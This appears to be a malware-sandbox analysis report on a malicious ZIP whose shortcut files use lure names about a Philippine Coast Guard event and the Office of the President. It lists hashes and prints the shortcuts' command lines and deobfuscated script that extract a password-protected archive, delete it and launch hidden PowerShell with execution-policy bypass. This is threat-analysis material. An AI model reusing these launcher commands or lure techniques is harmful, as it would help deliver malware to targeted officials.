Malicious
Malicious

8e130c2604516ccd4bcba72cc6549649

ZIP Archive
|
MD5: 8e130c2604516ccd4bcba72cc6549649
|
Size: 459.84 KB
|
application/zip

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
8e130c2604516ccd4bcba72cc6549649
Sha1
d70bad36a4060f93a3c5c9092bbf299c463a1451
Sha256
495cb43f3c2e3abd298a3282b1cc5da4d6c0d84b73bd3efcc44173cca950273c
Sha384
cd7c3e7f629c339ea855e1f8b497f20b012166d54657a39cffab3a198f7b19bf29063b80034d12637454a8c474c5d34f
Sha512
a04d8a2736476a0066aece17ae19b32c838b22ee96ef359320cb775342d41d53c4549f1cda180461e7c8c02275959489be784a514ea63f8aba751474333221f2
SSDeep
12288:i1x8DZXQN+IcPgrX5uSWEsmhKgHnqDSgz6Bnas:i1xMrIcPglRXagHqD6BV
TLSH
07A4239724731167FEB1FCA77CCC5A210FF484E973AE196B022AE85C45076A786CB05E
File Structure
8e130c2604516ccd4bcba72cc6549649
Malicious
124th_Anniversary_of_the_Philippine_Coast_Guard_Event_Summary_and_Feedback_Request_Office_of_the_Appointments_Secretary_OP_23102025.pdf.lnk
Malicious
[Lnk Summary]
Malicious
PCG_124th_Anniversary_Ceremonial_Report_and_Documentation_for_Review_and_Comments_Before_11AM_Deadline_Office_of_the_President_23102025.pdf.lnk
Malicious
[Lnk Summary]
Malicious
__MACOSX
Malicious
.vcredist.rar
ZoomWorkspace.bat
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /b /c "@echo off && for %I in (*-Archive.zip) do tar.exe -xf "%I" && "__MACOSX\ZoomWorkspace.bat" || "__MACOSX\ZoomWorkspace.bat""
LNK: Command Execution

cmd.exe /b /c "@echo off && tar.exe -xf "*-Archive.zip" && "__MACOSX\ZoomWorkspace.bat" || "__MACOSX\ZoomWorkspace.bat""
Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z64%" "%z64%" "x" -psuu9cskRIQjsBxYtr9TH -o "%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%RAR32%" "%RAR32%" "x" -hpsuu9cskRIQjsBxYtr9TH -y "%rsz%" "%drp%\" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z32%" "%z32%" "x" -psuu9cskRIQjsBxYtr9TH "-o%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" endlocal
Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%RAR32%" "%RAR32%" "x" -hpsuu9cskRIQjsBxYtr9TH -y "%rsz%" "%drp%\" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z32%" "%z32%" "x" -psuu9cskRIQjsBxYtr9TH "-o%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" endlocal
Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" [Unmanaged(ErrorStatementAst)] if exist "%z32%" "%z32%" "x" -psuu9cskRIQjsBxYtr9TH "-o%drp%\" -y "%rsz%" [Unmanaged(ErrorStatementAst)] if exist "%exf%" (Remove-Item "/s" "/q" "/a" "/f" "%rsz%") "powershell" -WindowStyle "hidden" -ep "Bypass" -nop "%exf%" exit /b "%errorlevel%" endlocal
Deobfuscated PowerShell

%exf% exit /b "%errorlevel%" endlocal
8e130c2604516ccd4bcba72cc6549649 (459.84 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙